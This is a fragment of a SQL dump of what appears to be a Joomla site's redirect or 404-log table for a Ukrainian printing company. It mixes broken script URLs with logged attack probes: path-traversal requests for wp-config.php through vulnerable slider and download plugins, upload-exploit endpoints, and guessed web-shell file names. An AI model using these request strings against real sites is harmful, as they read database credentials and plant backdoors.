00:00:00',301),(264,'http://ekvatorprint.com.ua/component/content/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/lobex21.php?rf','','','',1,0,'2016-01-10 13:10:12','0000-00-00 00:00:00',301),(265,'http://ekvatorprint.com.ua/component/content/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=lobex21.php','','','',1,0,'2016-01-10 13:10:12','0000-00-00 00:00:00',301),(266,'http://ekvatorprint.com.ua/component/content/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lobex21.php','','','',1,0,'2016-01-10 13:10:13','0000-00-00 00:00:00',301),(267,'http://ekvatorprint.com.ua/component/content/administrator/components/com_jinc/classes/graphics/tmp-upload-images/lobex21.php?rf','','','',1,0,'2016-01-10 13:10:13','0000-00-00 00:00:00',301),(268,'http://ekvatorprint.com.ua/component/content/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/lobex21.php?rf','','','',1,0,'2016-01-10 13:10:14','0000-00-00 00:00:00',301),(269,'http://ekvatorprint.com.ua/component/content/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/lobex21.php?rf','','','',1,0,'2016-01-10 13:10:15','0000-00-00 00:00:00',301),(270,'http://ekvatorprint.com.ua/loading.gif','','http://ekvatorprint.com.ua/media/plg_content_mavikthumbnails/slimbox2/css/slimbox2.css','',3,0,'2016-01-10 18:00:39','0000-00-00 00:00:00',301),(271,'http://ekvatorprint.com.ua/clike.su/adbstyles.js?u=100869','','http://ekvatorprint.com.ua/','',3,0,'2016-01-11 11:26:47','0000-00-00 00:00:00',301),(272,'http://ekvatorprint.com.ua/component/content/article?id=article&itemid=11','','','',9,0,'2016-01-12 08:58:32','0000-00-00 00:00:00',301),(273,'http://ekvatorprint.com.ua/component/content/article?id=article&itemid=16','','','',2,0,'2016-01-12 10:02:53','0000-00-00 00:00:00',301),(274,'http://ekvatorprint.com.ua//plugins/system/nnframework/css/style.css','','ekvatorprint.com.ua//plugins/system/nnframework/css/style.css','',1,0,'2016-01-13 13:16:17','0000-00-00 00:00:00',301),(275,'http://www.ekvatorprint.com.ua/undefined','','','',3,0,'2016-01-13 16:46:48','0000-00-00 00:00:00',301),(276,'http://ekvatorprint.com.ua/media/jui/js/!=typeof a||ma.test(a)||!k.htmlSerialize&&ga.test(a)||!k.leadingWhitespace&&ha.test(a)||ra[(ja.exec(a)||[','','','',1,0,'2016-01-14 03:12:05','0000-00-00 00:00:00',301),(277,'http://ekvatorprint.com.ua/media/jui/js/).length,k.html5Clone=','','','',1,0,'2016-01-14 03:12:05','0000-00-00 00:00:00',301),(278,'http://ekvatorprint.com.ua/media/jui/js/).length,k.htmlSerialize=!!b.getElementsByTagName(','','','',1,0,'2016-01-14 03:12:06','0000-00-00 00:00:00',301),(279,'http://ekvatorprint.com.ua/media/jui/js/,data:b}).done(function(a){e=arguments,g.html(d?m(','','','',1,0,'2016-01-14 03:12:07','0000-00-00 00:00:00',301),(280,'http://ekvatorprint.com.ua/media/jui/js/===c)&&(b.defaultValue=a.defaultValue)}}m.extend({clone:function(a,b,c){var d,e,f,g,h,i=m.contains(a.ownerDocument,a);if(k.html5Clone||m.isXMLDoc(a)||!ga.test(','','','',1,0,'2016-01-14 03:12:07','0000-00-00 00:00:00',301),(281,'http://ekvatorprint.com.ua/media/jui/js/],_default:k.htmlSerialize?[0,','','','',1,0,'2016-01-14 03:12:08','0000-00-00 00:00:00',301),(282,'http://ekvatorprint.com.ua/media/jui/js/),this.$menu.html(t),this},next:function(t){var n=this.$menu.find(','','','',1,0,'2016-01-14 03:12:10','0000-00-00 00:00:00',301),(283,'http://ekvatorprint.com.ua/media/jui/js/).html(n.highlighter(r)),t[0]}),t.first().addClass(','','','',1,0,'2016-01-14 03:12:10','0000-00-00 00:00:00',301),(284,'http://ekvatorprint.com.ua/media/jui/js/)[this.options.html','','','',1,0,'2016-01-14 03:12:11','0000-00-00 00:00:00',301),(285,'http://ekvatorprint.com.ua/media/jui/js/).first().html(t),this.search_results.append(n)},n.prototype.no_results_clear=function(){return this.search_results.find(','','','',1,0,'2016-01-14 03:12:11','0000-00-00 00:00:00',301),(286,'http://ekvatorprint.com.ua/media/jui/js/).text(e.trim(this.search_field.val())).html()},n.prototype.winnow_results_set_highlight=function(){var e,t;t=this.is_multiple?[]:this.search_results.find(','','','',1,0,'2016-01-14 03:12:11','0000-00-00 00:00:00',301),(287,'http://ekvatorprint.com.ua/media/jui/js/):this.container.html(','','','',1,0,'2016-01-14 03:12:12','0000-00-00 00:00:00',301),(288,'http://ekvatorprint.com.ua/media/jui/js/+t.html+','','','',1,0,'2016-01-14 03:12:12','0000-00-00 00:00:00',301),(289,'http://ekvatorprint.com.ua/media/jui/js/,n),this.is_multiple?this.container.html(','','','',1,0,'2016-01-14 03:12:13','0000-00-00 00:00:00',301),(290,'http://ekvatorprint.com.ua/media/jui/js/}).html(','','','',1,0,'2016-01-14 03:12:13','0000-00-00 00:00:00',301),(291,'http://ekvatorprint.com.ua/media/jui/js/,shivDocument:j,createElement:g,createDocumentFragment:h,addElements:e};a.html5=t,j(b),','','','',1,0,'2016-01-14 03:12:13','0000-00-00 00:00:00',301),(292,'http://ekvatorprint.com.ua/media/system/js/);e--;)k=k.firstChild;this.empty().adopt(k.childNodes);q||u.removeChild(f)}}(Element.Properties.html.set);b=document.createElement(','','','',1,0,'2016-01-14 03:12:14','0000-00-00 00:00:00',301),(293,'http://ekvatorprint.com.ua/media/system/js/);if(!b){b=new Request.HTML({data:this,link:','','','',1,0,'2016-01-14 03:12:14','0000-00-00 00:00:00',301),(294,'http://ekvatorprint.com.ua/media/system/js/,c.html);c.tree=b.childNodes;c.elements=b.getElements(a.filter||','','','',1,0,'2016-01-14 03:12:15','0000-00-00 00:00:00',301),(295,'http://ekvatorprint.com.ua/media/system/js/,i);b.head=b.html=b.window=null};this.attachEvent(','','','',1,0,'2016-01-14 03:12:15','0000-00-00 00:00:00',301),(296,'http://ekvatorprint.com.ua/media/system/js/,i)}var j=Array.from;try{j(b.html.childNodes)}catch(m){Array.from=function(b){if(typeof b!=','','','',1,0,'2016-01-14 03:12:15','0000-00-00 00:00:00',301),(297,'http://ekvatorprint.com.ua/media/system/js/,r=null;if(!b||!w||!q)Element.Properties.html.set=function(a){var b={table:[1,','','','',1,0,'2016-01-14 03:12:16','0000-00-00 00:00:00',301),(298,'http://ekvatorprint.com.ua/media/system/js/],function(a){f[a.toLowerCase()]=a});f.html=','','','',1,0,'2016-01-14 03:12:16','0000-00-00 00:00:00',301),(299,'http://ekvatorprint.com.ua/media/system/js/},makeRequest:function(){this.request=new Request.HTML(Object.merge({url:this.element.get(','','','',1,0,'2016-01-14 03:12:17','0000-00-00 00:00:00',301),(300,'http://ekvatorprint.com.ua/mc.yandex.ru/watch/14005087','','','',2,0,'2016-01-14 03:12:17','0000-00-00 00:00:00',301),(301,'http://ekvatorprint.com.ua/media/jui/js/===c?(b.parentNode&&(b.outerHTML=a.outerHTML),k.html5Clone&&a.innerHTML&&!m.trim(b.innerHTML)&&(b.innerHTML=a.innerHTML)):','','','',1,0,'2016-01-14 03:12:20','0000-00-00 00:00:00',301),(302,'http://ekvatorprint.com.ua/media/jui/js/\'+t+\'','','','',1,0,'2016-01-14 03:12:22','0000-00-00 00:00:00',301),(303,'http://ekvatorprint.com.ua/media/system/js/in a?a.htmlFor=b:a.setAttribute(','','','',1,0,'2016-01-14 03:12:22','0000-00-00 00:00:00',301),(304,'http://ekvatorprint.com.ua/media/system/js/in this?this.htmlFor:this.getAttribute(','','','',1,0,'2016-01-14 03:12:23','0000-00-00 00:00:00',301),(305,'http://ekvatorprint.com.ua/media/plg_content_mavikthumbnails/slimbox2/js/});w(p).width(k.width);w([p,I,d]).height(k.height);w(A).html(f[F][1]||','','','',2,0,'2016-01-14 03:12:23','0000-00-00 00:00:00',301),(306,'http://ekvatorprint.com.ua/components/com_phocagallery/assets/highslide/\"+ this.graphic.src + \"','','','',1,0,'2016-01-14 03:12:23','0000-00-00 00:00:00',301),(307,'http://ekvatorprint.com.ua/components/com_phocagallery/assets/highslide/\'+ this.src +\'','','','',1,0,'2016-01-14 03:12:24','0000-00-00 00:00:00',301),(308,'http://ekvatorprint.com.ua/components/com_phocagallery/assets/highslide/hs.htmlExpand','','','',1,0,'2016-01-14 03:12:25','0000-00-00 00:00:00',301),(309,'http://ekvatorprint.com.ua/printing-on-vinyl/https:/www.youtube.com/embed/gPBGj9g3b-E','','','',2,0,'2016-01-14 03:12:25','0000-00-00 00:00:00',301),(310,'http://ekvatorprint.com.ua/video/https:/www.youtube.com/embed/KbMdSqMLzuU','','','',2,0,'2016-01-14 03:12:26','0000-00-00 00:00:00',301),(311,'http://ekvatorprint.com.ua/video/https:/www.youtube.com/embed/WdfNRTw1nlw','','','',2,0,'2016-01-14 03:12:26','0000-00-00 00:00:00',301),(312,'http://ekvatorprint.com.ua/video/https:/www.youtube.com/embed/gPBGj9g3b-E','','','',2,0,'2016-01-14 03:12:26','0000-00-00 00:00:00',301),(313,'http://ekvatorprint.com.ua/https:/www.youtube.com/embed/gPBGj9g3b-E','','','',2,0,'2016-01-14 03:12:27','0000-00-00 00:00:00',301),(314,'http://ekvatorprint.com.ua/component/content/article','','','',46,0,'2016-01-14 03:12:29','0000-00-00 00:00:00',301),(315,'http://ekvatorprint.com.ua/modules/mod_related_system/mod_related_system.php','','','',1,0,'2016-01-14 05:45:38','0000-00-00 00:00:00',301),(316,'http://ekvatorprint.com.ua/administrator/cachefix.php','','http://ekvatorprint.com.ua/administrator/cachefix.php','',6,0,'2016-01-14 07:49:15','0000-00-00 00:00:00',301),(317,'http://ekvatorprint.com.ua/templates/atomic/cachefix.php','','http://ekvatorprint.com.ua/templates/atomic/cachefix.php','',1,0,'2016-01-14 07:49:15','0000-00-00 00:00:00',301),(318,'http://ekvatorprint.com.ua/images/cachefix.php','','http://ekvatorprint.com.ua/images/cachefix.php','',6,0,'2016-01-14 07:49:46','0000-00-00 00:00:00',301),(319,'http://ekvatorprint.com.ua/mobile/print-billboards','','','',2,0,'2016-01-15 05:00:42','0000-00-00 00:00:00',301),(320,'http://ekvatorprint.com.ua/m/print-billboards','','','',2,0,'2016-01-15 05:14:08','0000-00-00 00:00:00',301),(321,'http://ekvatorprint.com.ua/user','','','',5,0,'2016-01-15 21:59:51','0000-00-00 00:00:00',301),(322,'http://ekvatorprint.com.ua/index.php?option=com_jdownloads','','','',1,0,'2016-01-16 07:13:42','0000-00-00 00:00:00',301),(323,'http://ekvatorprint.com.ua/sitema.php','','','',1,0,'2016-01-16 15:13:34','0000-00-00 00:00:00',301),(324,'http://ekvatorprint.com.ua/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',63,0,'2016-01-16 16:22:29','0000-00-00 00:00:00',301),(325,'http://ekvatorprint.com.ua/modules/mod_mapsapi/mod_mapsapi.php','','http://ekvatorprint.com.ua/modules/mod_mapsapi/mod_mapsapi.php','',11,0,'2016-01-16 19:41:16','0000-00-00 00:00:00',301),(326,'http://ekvatorprint.com.ua/modules/mod_mapsgoogle/mod_mapsgoogle.php','','http://ekvatorprint.com.ua/modules/mod_mapsgoogle/mod_mapsgoogle.php','',7,0,'2016-01-16 19:41:16','0000-00-00 00:00:00',301),(327,'http://ekvatorprint.com.ua/modules/mod_apigoogle/mod_apigoogle.php','','http://ekvatorprint.com.ua/modules/mod_apigoogle/mod_apigoogle.php','',5,0,'2016-01-16 19:42:15','0000-00-00 00:00:00',301),(328,'http://ekvatorprint.com.ua/wp-content/uploads/1014616.php','','','',1,0,'2016-01-17 23:52:22','0000-00-00 00:00:00',301),(329,'http://ekvatorprint.com.ua/license.php','','http://ekvatorprint.com.ua//license.php','',152,0,'2016-01-17 23:55:05','0000-00-00 00:00:00',301),(330,'http://ekvatorprint.com.ua/1013s.php','','','',1,0,'2016-01-17 23:55:07','0000-00-00 00:00:00',301),(331,'http://ekvatorprint.com.ua/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','','','',19,0,'2016-01-18 05:55:15','0000-00-00 00:00:00',301),(332,'http://ekvatorprint.com.ua/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php','','','',6,0,'2016-01-18 05:55:16','0000-00-00 00:00:00',301),(333,'http://ekvatorprint.com.ua/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php','','','',19,0,'2016-01-18 05:55:18','0000-00-00 00:00:00',301),(334,'http://ekvatorprint.com.ua/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php','','','',1,0,'2016-01-18 05:55:29','0000-00-00 00:00:00',301),(335,'http://ekvatorprint.com.ua/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php','','','',1,0,'2016-01-18 05:55:33','0000-00-00 00:00:00',301),(336,'http://ekvatorprint.com.ua/adguard-ajax-api/api?type=gm-get-value&unique_name=Adguard Assistant&variable_key=settings&sn=3df995bacf4eea9a6aebd52dd058c1f8358ba7ddb5593f9c10619455c311f955','','http://ekvatorprint.com.ua/video','',1,0,'2016-01-18 09:16:38','0000-00-00 00:00:00',301),(337,'http://www.ekvatorprint.com.ua/media/jui/js/!=typeof a||ma.test(a)||!k.htmlSerialize&&ga.test(a)||!k.leadingWhitespace&&ha.test(a)||ra[(ja.exec(a)||[','','','',1,0,'2016-01-18 11:14:59','0000-00-00 00:00:00',301),(338,'http://www.ekvatorprint.com.ua/media/jui/js/).length,k.html5Clone=','','','',1,0,'2016-01-18 11:14:59','0000-00-00 00:00:00',301),(339,'http://www.ekvatorprint.com.ua/media/jui/js/).length,k.htmlSerialize=!!b.getElementsByTagName(','','','',1,0,'2016-01-18 11:15:00','0000-00-00 00:00:00',301),(340,'http://www.ekvatorprint.com.ua/media/jui/js/,data:b}).done(function(a){e=arguments,g.html(d?m(','','','',1,0,'2016-01-18 11:15:00','0000-00-00 00:00:00',301),(341,'http://www.ekvatorprint.com.ua/media/jui/js/===c)&&(b.defaultValue=a.defaultValue)}}m.extend({clone:function(a,b,c){var d,e,f,g,h,i=m.contains(a.ownerDocument,a);if(k.html5Clone||m.isXMLDoc(a)||!ga.test(','','','',1,0,'2016-01-18 11:15:01','0000-00-00 00:00:00',301),(342,'http://www.ekvatorprint.com.ua/media/jui/js/],_default:k.htmlSerialize?[0,','','','',1,0,'2016-01-18 11:15:03','0000-00-00 00:00:00',301),(343,'http://www.ekvatorprint.com.ua/media/jui/js/),this.$menu.html(t),this},next:function(t){var n=this.$menu.find(','','','',1,0,'2016-01-18 11:15:05','0000-00-00 00:00:00',301),(344,'http://www.ekvatorprint.com.ua/media/jui/js/).html(n.highlighter(r)),t[0]}),t.first().addClass(','','','',1,0,'2016-01-18 11:15:06','0000-00-00 00:00:00',301),(345,'http://www.ekvatorprint.com.ua/media/jui/js/)[this.options.html','','','',1,0,'2016-01-18 11:15:06','0000-00-00 00:00:00',301),(346,'http://www.ekvatorprint.com.ua/media/jui/js/).first().html(t),this.search_results.append(n)},n.prototype.no_results_clear=function(){return this.search_results.find(','','','',1,0,'2016-01-18 11:15:07','0000-00-00 00:00:00',301),(347,'http://www.ekvatorprint.com.ua/media/jui/js/).text(e.trim(this.search_field.val())).html()},n.prototype.winnow_results_set_highlight=function(){var e,t;t=this.is_multiple?[]:this.search_results.find(','','','',1,0,'2016-01-18 11:15:07','0000-00-00 00:00:00',301),(348,'http://www.ekvatorprint.com.ua/media/jui/js/):this.container.html(','','','',1,0,'2016-01-18 11:15:08','0000-00-00 00:00:00',301),(349,'http://www.ekvatorprint.com.ua/media/jui/js/+t.html+','','','',1,0,'2016-01-18 11:15:08','0000-00-00 00:00:00',301),(350,'http://www.ekvatorprint.com.ua/media/jui/js/,n),this.is_multiple?this.container.html(','','','',1,0,'2016-01-18 11:15:08','0000-00-00 00:00:00',301),(351,'http://www.ekvatorprint.com.ua/media/jui/js/}).html(','','','',1,0,'2016-01-18 11:15:09','0000-00-00 00:00:00',301),(352,'http://www.ekvatorprint.com.ua/media/jui/js/,shivDocument:j,createElement:g,createDocumentFragment:h,addElements:e};a.html5=t,j(b),','','','',1,0,'2016-01-18 11:15:09','0000-00-00 00:00:00',301),(353,'http://www.ekvatorprint.com.ua/media/system/js/);e--;)k=k.firstChild;this.empty().adopt(k.childNodes);q||u.removeChild(f)}}(Element.Properties.html.set);b=document.createElement(','','','',1,0,'2016-01-18 11:15:10','0000-00-00 00:00:00',301),(354,'http://www.ekvatorprint.com.ua/media/system/js/);if(!b){b=new Request.HTML({data:this,link:','','','',1,0,'2016-01-18 11:15:11','0000-00-00 00:00:00',301),(355,'http://www.ekvatorprint.com.ua/media/system/js/,c.html);c.tree=b.childNodes;c.elements=b.getElements(a.filter||','','','',1,0,'2016-01-18 11:15:11','0000-00-00 00:00:00',301),(356,'http://www.ekvatorprint.com.ua/media/system/js/,i);b.head=b.html=b.window=null};this.attachEvent(','','','',1,0,'2016-01-18 11:15:11','0000-00-00 00:00:00',301),(357,'http://www.ekvatorprint.com.ua/media/system/js/,i)}var j=Array.from;try{j(b.html.childNodes)}catch(m){Array.from=function(b){if(typeof b!=','','','',1,0,'2016-01-18 11:15:12','0000-00-00 00:00:00',301),(358,'http://www.ekvatorprint.com.ua/media/system/js/,r=null;if(!b||!w||!q)Element.Properties.html.set=function(a){var b={table:[1,','','','',1,0,'2016-01-18 11:15:12','0000-00-00 00:00:00',301),(359,'http://www.ekvatorprint.com.ua/media/system/js/],function(a){f[a.toLowerCase()]=a});f.html=','','','',1,0,'2016-01-18 11:15:13','0000-00-00 00:00:00',301),(360,'http://www.ekvatorprint.com.ua/media/system/js/},makeRequest:function(){this.request=new Request.HTML(Object.merge({url:this.element.get(','','','',1,0,'2016-01-18 11:15:13','0000-00-00 00:00:00',301),(361,'http://www.ekvatorprint.com.ua/mc.yandex.ru/watch/14005087','','','',1,0,'2016-01-18 11:15:14','0000-00-00 00:00:00',301),(362,'http://www.ekvatorprint.com.ua/media/jui/js/===c?(b.parentNode&&(b.outerHTML=a.outerHTML),k.html5Clone&&a.innerHTML&&!m.trim(b.innerHTML)&&(b.innerHTML=a.innerHTML)):','','','',1,0,'2016-01-18 11:15:18','0000-00-00 00:00:00',301),(363,'http://www.ekvatorprint.com.ua/media/jui/js/\'+t+\'','','','',1,0,'2016-01-18 11:15:19','0000-00-00 00:00:00',301),(364,'http://www.ekvatorprint.com.ua/media/system/js/in a?a.htmlFor=b:a.setAttribute(','','','',1,0,'2016-01-18 11:15:20','0000-00-00 00:00:00',301),(365,'http://www.ekvatorprint.com.ua/media/system/js/in this?this.htmlFor:this.getAttribute(','','','',1,0,'2016-01-18 11:15:20','0000-00-00 00:00:00',301),(366,'http://www.ekvatorprint.com.ua/media/plg_content_mavikthumbnails/slimbox2/js/});w(p).width(k.width);w([p,I,d]).height(k.height);w(A).html(f[F][1]||','','','',1,0,'2016-01-18 11:15:21','0000-00-00 00:00:00',301),(367,'http://www.ekvatorprint.com.ua/components/com_phocagallery/assets/highslide/\"+ this.graphic.src + \"','','','',1,0,'2016-01-18 11:15:21','0000-00-00 00:00:00',301),(368,'http://www.ekvatorprint.com.ua/components/com_phocagallery/assets/highslide/\'+ this.src +\'','','','',1,0,'2016-01-18 11:15:22','0000-00-00 00:00:00',301),(369,'http://www.ekvatorprint.com.ua/components/com_phocagallery/assets/highslide/hs.htmlExpand','','','',1,0,'2016-01-18 11:15:23','0000-00-00 00:00:00',301),(370,'http://www.ekvatorprint.com.ua/printing-on-vinyl/https:/www.youtube.com/embed/gPBGj9g3b-E','','','',1,0,'2016-01-18 11:15:23','0000-00-00 00:00:00',301),(371,'http://www.ekvatorprint.com.ua/video/https:/www.youtube.com/embed/KbMdSqMLzuU','','','',1,0,'2016-01-18 11:15:24','0000-00-00 00:00:00',301),(372,'http://www.ekvatorprint.com.ua/video/https:/www.youtube.com/embed/WdfNRTw1nlw','','','',1,0,'2016-01-18 11:15:24','0000-00-00 00:00:00',301),(373,'http://www.ekvatorprint.com.ua/video/https:/www.youtube.com/embed/gPBGj9g3b-E','','','',1,0,'2016-01-18 11:15:24','0000-00-00 00:00:00',301),(374,'http://www.ekvatorprint.com.ua/https:/www.youtube.com/embed/gPBGj9g3b-E','','','',1,0,'2016-01-18 11:15:25','0000-00-00 00:00:00',301),(375,'http://www.ekvatorprint.com.ua/component/content/article','','','',1,0,'2016-01-18 11:15:28','0000-00-00 00:00:00',301),(376,'http://www.ekvatorprint.com.ua/component/content/article?id=article','','','',1,0,'2016-01-18 11:15:32','0000-00-00 00:00:00',301),(377,'http://ekvatorprint.com.ua/administrator/ index.php','','','',3,0,'2016-01-18 16:30:18','0000-00-00 00:00:00',301),(378,'http://ekvatorprint.com.ua/apple-touch-icon-114x114-precomposed.png','','','',5,0,'2016-01-18 21:13:56','0000-00-00 00:00:00',301),(379,'http://ekvatorprint.com.ua/apple-touch-icon-114x114.png','','','',4,0,'2016-01-18 21:13:57','0000-00-00 00:00:00',301),(380,'http://ekvatorprint.com.ua/?format=feed&type=atom','','','',3,0,'2016-01-19 12:13:04','0000-00-00 00:00:00',301),(381,'http://ekvatorprint.com.ua/components/com_creativecontactform/readme.txt','','','',1,0,'2016-01-19 16:05:16','0000-00-00 00:00:00',301),(382,'http://ekvatorprint.com.ua/components/com_creativecontactform/assets/css/main.css','','','',2,0,'2016-01-19 16:14:49','0000-00-00 00:00:00',301),(383,'http://ekvatorprint.com.ua/components/com_simplephotogallery/js/zoominout/main.js','','','',1,0,'2016-01-19 19:35:52','0000-00-00 00:00:00',301),(384,'http://ekvatorprint.com.ua/administrator/components/com_simplephotogallery/js/main.js','','','',1,0,'2016-01-19 19:48:43','0000-00-00 00:00:00',301),(385,'http://ekvatorprint.com.ua/components/com_simplephotogallery/js/main.js','','','',1,0,'2016-01-19 20:07:41','0000-00-00 00:00:00',301),(386,'http://ekvatorprint.com.ua/administrator/components/com_simplephotogallery/lib/uploadFile.php','','','',18,0,'2016-01-19 20:49:55','0000-00-00 00:00:00',301),(387,'http://ekvatorprint.com.ua/2011-04-26-17-32-21','','','',10,0,'2016-01-20 04:02:05','0000-00-00 00:00:00',301),(388,'http://ekvatorprint.com.ua/component/jdownloads/upload','','','',1,0,'2016-01-23 03:00:10','0000-00-00 00:00:00',301),(389,'http://ekvatorprint.com.ua/apple-touch-icon-144x144-precomposed.png','','','',3,0,'2016-01-23 19:57:18','0000-00-00 00:00:00',301),(390,'http://ekvatorprint.com.ua/apple-touch-icon-144x144.png','','','',2,0,'2016-01-23 19:57:18','0000-00-00 00:00:00',301),(391,'http://ekvatorprint.com.ua/media/com_phocagallery/images/icon-info.gif','','http://ekvatorprint.com.ua/media/com_phocagallery/css/main/phocagallery.css','',4,0,'2016-01-25 13:21:34','0000-00-00 00:00:00',301),(392,'http://ekvatorprint.com.ua/null/InterYield/getSnoozing.do?callback=null.getSnoozing&affiliate=null&subid=null&adCountIntervalHours=12&maxAdCountsPerInterval=3&protocol=http&fulldomain=ekvatorprint.com.ua&domain=com.ua&title=Печать на холсте Харьков. Печат','','http://ekvatorprint.com.ua/printing-on-canvas?yclid=5954891549624873535','',1,0,'2016-01-26 17:55:47','0000-00-00 00:00:00',301),(393,'http://ekvatorprint.com.ua/apple-touch-icon-152x152-precomposed.png','','','',212,0,'2016-01-26 18:33:48','0000-00-00 00:00:00',301),(394,'http://ekvatorprint.com.ua/apple-touch-icon-152x152.png','','','',211,0,'2016-01-26 18:33:48','0000-00-00 00:00:00',301),(395,'http://ekvatorprint.com.ua/templates/gk_ilife/images/menu_li.png','','','',4,0,'2016-01-27 09:58:54','0000-00-00 00:00:00',301),(396,'http://ekvatorprint.com.ua/templates/gk_ilife/images/menu_bg_active.png','','','',4,0,'2016-01-27 09:58:54','0000-00-00 00:00:00',301),(397,'http://ekvatorprint.com.ua/templates/gk_ilife/images/menu_bg_hover.png','','','',4,0,'2016-01-27 09:58:55','0000-00-00 00:00:00',301),(398,'http://ekvatorprint.com.ua/ index.php','','','',1,0,'2016-01-28 03:10:20','0000-00-00 00:00:00',301),(399,'http://ekvatorprint.com.ua/trebovaniya -','','','',2,0,'2016-01-28 12:31:19','0000-00-00 00:00:00',301),(400,'http://ekvatorprint.com.ua/printing-on-canvas/undefined','','','',1,0,'2016-01-28 20:22:35','0000-00-00 00:00:00',301),(401,'http://ekvatorprint.com.ua/.google-analytics.com/ga.js','','','',2,0,'2016-01-29 17:19:04','0000-00-00 00:00:00',301),(402,'http://ekvatorprint.com.ua/index.php?option=com_user&view=register','','http://ekvatorprint.com.ua/index.php?option=com_user&view=register','',91,0,'2016-01-29 18:36:27','0000-00-00 00:00:00',301),(403,'http://ekvatorprint.com.ua/index.php?option=com_user&view=login','','http://ekvatorprint.com.ua/index.php?option=com_user&view=login','',3,0,'2016-01-30 19:54:49','0000-00-00 00:00:00',301),(404,'http://ekvatorprint.com.ua/index.php?option=com_user&view=user&task=edit','','http://ekvatorprint.com.ua','',14,0,'2016-01-30 19:54:50','0000-00-00 00:00:00',301),(405,'http://ekvatorprint.com.ua/includes/fckeditor/editor/','','','',3,0,'2016-01-31 00:45:10','0000-00-00 00:00:00',301),(406,'http://ekvatorprint.com.ua/adguard-ajax-api/api?type=gm-get-value&unique_name=Adguard Assistant&variable_key=settings&sn=cace5c082bdf253136e8fdcb2a221164eec134cd0b3f4fd0262748860eca2df3','','http://ekvatorprint.com.ua/trebovaniya','',1,0,'2016-01-31 16:39:24','0000-00-00 00:00:00',301),(407,'http://ekvatorprint.com.ua/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743','','','',1,0,'2016-02-03 17:10:02','0000-00-00 00:00:00',301),(408,'http://ekvatorprint.com.ua/2010-12-06-16-34-21','','','',10,0,'2016-02-03 22:29:54','0000-00-00 00:00:00',301),(409,'http://ekvatorprint.com.ua/libraries/lol.php','','','',4,0,'2016-02-03 23:23:24','0000-00-00 00:00:00',301),(410,'http://ekvatorprint.com.ua/libraries/joomla/css.php','','','',8,0,'2016-02-03 23:23:25','0000-00-00 00:00:00',301),(411,'http://ekvatorprint.com.ua/uploads/extensions/43374_resizeDown302px133px16.jpg','','http://ekvatorprint.com.ua/administrator/index.php?option=com_installer','',1,0,'2016-02-04 13:55:54','0000-00-00 00:00:00',301),(412,'http://ekvatorprint.com.ua/uploads/extensions/42142_resizeDown302px133px16.jpg','','http://ekvatorprint.com.ua/administrator/index.php?option=com_installer','',1,0,'2016-02-04 14:03:14','0000-00-00 00:00:00',301),(413,'http://ekvatorprint.com.ua/admonistrator','','','',1,0,'2016-02-05 20:37:13','0000-00-00 00:00:00',301),(414,'http://ekvatorprint.com.ua/printing','','','',2,0,'2016-02-06 13:39:04','0000-00-00 00:00:00',301),(415,'http://ekvatorprint.com.ua/component/user/register','','','',4,0,'2016-02-07 11:25:23','0000-00-00 00:00:00',301),(416,'http://ekvatorprint.com.ua/index.php/component/user/register','','','',11,0,'2016-02-07 11:25:23','0000-00-00 00:00:00',301),(417,'http://ekvatorprint.com.ua/wsdl.php','','','',1,0,'2016-02-08 06:24:02','0000-00-00 00:00:00',301),(418,'http://ekvatorprint.com.ua/wp_stkkn.php','','','',1,0,'2016-02-08 06:24:02','0000-00-00 00:00:00',301),(419,'http://ekvatorprint.com.ua/sql.php','','','',6,0,'2016-02-08 06:24:02','0000-00-00 00:00:00',301),(420,'http://ekvatorprint.com.ua/privacy.php?youfindit=1','','','',2,0,'2016-02-08 06:24:02','0000-00-00 00:00:00',301),(421,'http://ekvatorprint.com.ua/post.php','','','',3,0,'2016-02-08 06:24:02','0000-00-00 00:00:00',301),(422,'http://ekvatorprint.com.ua/indexs.php','','','',1,0,'2016-02-08 06:24:02','0000-00-00 00:00:00',301),(423,'http://ekvatorprint.com.ua/green.php','','','',1,0,'2016-02-08 06:24:02','0000-00-00 00:00:00',301),(424,'http://ekvatorprint.com.ua/conns.php','','','',3,0,'2016-02-08 06:24:02','0000-00-00 00:00:00',301),(425,'http://ekvatorprint.com.ua/components/com_content/mods.php','','','',2,0,'2016-02-08 21:37:31','0000-00-00 00:00:00',301),(426,'http://ekvatorprint.com.ua/LICEMSE.php','','','',1,0,'2016-02-08 21:37:31','0000-00-00 00:00:00',301),(427,'http://ekvatorprint.com.ua/images/mod_artlcle.php?images=1','','','',1,0,'2016-02-08 21:37:32','0000-00-00 00:00:00',301),(428,'http://ekvatorprint.com.ua/images/wp-includ.php','','','',1,0,'2016-02-08 21:37:32','0000-00-00 00:00:00',301),(429,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder=','','','',7,0,'2016-02-10 23:40:33','0000-00-00 00:00:00',301),(430,'http://ekvatorprint.com.ua/images/xxu.php','','','',20,0,'2016-02-10 23:40:34','0000-00-00 00:00:00',301),(431,'http://ekvatorprint.com.ua/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=2','','','',9,0,'2016-02-11 16:08:43','0000-00-00 00:00:00',301),(432,'http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/poster','','http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/jcemediabox.js?01f6bb1635ffb37306d7b368d146f889','',4,0,'2016-02-11 18:19:26','0000-00-00 00:00:00',301),(433,'http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/url.indexOf(base','','http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/jcemediabox.js?01f6bb1635ffb37306d7b368d146f889','',4,0,'2016-02-11 18:19:26','0000-00-00 